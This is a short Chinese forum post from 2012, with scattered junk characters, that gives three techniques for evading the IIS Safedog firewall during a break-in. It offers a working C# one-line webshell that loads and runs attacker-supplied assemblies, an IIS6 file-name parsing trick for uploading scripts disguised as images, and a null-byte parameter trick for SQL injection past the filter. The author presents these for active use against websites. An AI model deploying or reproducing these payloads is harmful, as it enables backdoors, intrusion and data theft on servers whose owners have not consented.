1、绕过IIS安全狗的一句话。
) X3 p$ S! L) A8 a; C$ K前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。0 D- ^( U2 J/ ?0 B/ s
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。, i& v) x5 N5 {$ D: Q4 d3 U
) u9 v4 S& u7 R
2、IIS6.0解析漏洞遇到安全狗。. j/ S& `1 u, v( y8 x2 M& p
文件名为
; b) P8 d1 R$ x# _- `. l- H" Thttp://www.xxxxx.com/sh3llc0de.asp;1.jpg& b0 U# ], K/ @* m; E- k6 }
8 b5 c0 q) _# r% ]$ t
这样的会被IIS安全狗果断屏蔽。4 ?, B7 }0 Z2 S5 ~! s9 A6 L
改成如下名称,IIS6一样会解析: }8 R( S2 z) ~; q
www.xxxxx.com/;1.asp;1.jpg
4 x0 A; P* U' H. q4 m
1 G+ n2 m0 H# [ ]2 F+ {3、安全狗的注入绕过。" B3 S: L. s3 w# u) G6 @6 E; @/ f
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
, r5 e8 E9 @% `- A! x) P( n- ^但如果:, m9 w1 Y% l ~1 o
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1, L- |. U& P$ n+ h5 i7 j9 c6 D6 l0 x
就可以成功绕过了。# K6 ~6 F* \) v' f
( m) ?* j7 Z: y% X/ Y, ~& G& u n3 b6 c I- g
|
发表于 2012-10-31 08:25:30
收藏
支持
反对